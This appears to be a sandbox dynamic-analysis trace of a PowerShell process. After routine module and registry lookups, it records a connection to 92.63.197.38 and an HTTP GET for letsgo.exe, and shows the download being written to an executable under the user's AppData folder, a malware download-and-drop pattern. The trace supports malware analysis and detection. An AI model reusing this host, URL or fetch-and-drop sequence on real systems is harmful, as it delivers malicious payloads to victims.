| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\NetworkSwitchManager.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkTransition\NetworkTransition.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PcsvDevice\PcsvDevice.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PnpDevice\PnpDevice.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PrintManagement\PrintManagement.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\PSDesiredStateConfiguration.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\PSWorkflowUtility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ScheduledTasks\ScheduledTasks.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SecureBoot\SecureBoot.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbWitness\SmbWitness.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\StartLayout\StartLayout.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Storage\Storage.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TLS\TLS.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack\TroubleshootingPack.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TrustedPlatformModule\TrustedPlatformModule.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\VpnClient\VpnClient.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Wdac\Wdac.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsDeveloperLicense\WindowsDeveloperLicense.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsSearch\WindowsSearch.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsUpdate\WindowsUpdate.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096 |
|
4 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 3546 |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, type = file_type |
|
2 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, size = 4096, size_out = 4096 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\.NETFramework\XML |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\XML |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, size = 5, size_out = 5 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, size = 4096, size_out = 2818 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, size = 4096, size_out = 0 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
3 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_type |
|
2 | |
| File | Read | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, size = 4096, size_out = 2384 |
|
1 | |
| File | Read | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, size = 688, size_out = 0 |
|
1 | |
| File | Read | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
2 | |
| File | Create | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\PSGetModuleInfo.xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility, type = file_attributes |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes |
|
3 | |
| File | Create | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_type |
|
2 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes |
|
2 | |
| File | Create | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
6 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Get Info | filename = STD_ERROR_HANDLE, type = file_type |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework, value_name = LegacyWPADSupport, type = REG_NONE |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC |
|
1 | |
| Environment | Get Environment String | name = PinnableBufferCache_System.Net.HttpWebRequest_Disabled |
|
1 | |
| Environment | Get Environment String | name = PinnableBufferCache_System.Net.HttpWebRequest_MinCount |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Environment | Get Environment String | name = PinnableBufferCache_System.Net.Connection_Disabled |
|
1 | |
| Environment | Get Environment String | name = PinnableBufferCache_System.Net.Connection_MinCount |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319, value_name = HWRPortReuseOnSocketBind, type = REG_NONE |
|
1 | |
| Socket | Connect | remote_address = 92.63.197.38, remote_port = 80 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 79, size_out = 79 |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = 92.63.197.38, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /letsgo.exe?LbPUer |
|
1 | |
| Inet | Send HTTP Request | headers = host: 92.63.197.38, connection: Keep-Alive, url = 92.63.197.38/letsgo.exe?LbPUer |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 10424 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 10424 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 10166 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 31944 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 31944 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 31944 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 42108 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 42108 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 42108 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5808 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 5808 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 5808 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 18876 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 18876 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 17684 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 15972 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 15972 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 15972 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5576 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 5576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 5576 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 64344 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 25940 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 25940 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 25940 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 53362, size_out = 53362 |
|
1 | |
| Inet | Read Response | size = 53362, size_out = 53362 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 53362 |
|
1 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
2 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| File | Get Info | filename = C:\ProgramData\Oracle\Java\javapath, type = file_attributes |
|
16 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
7 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
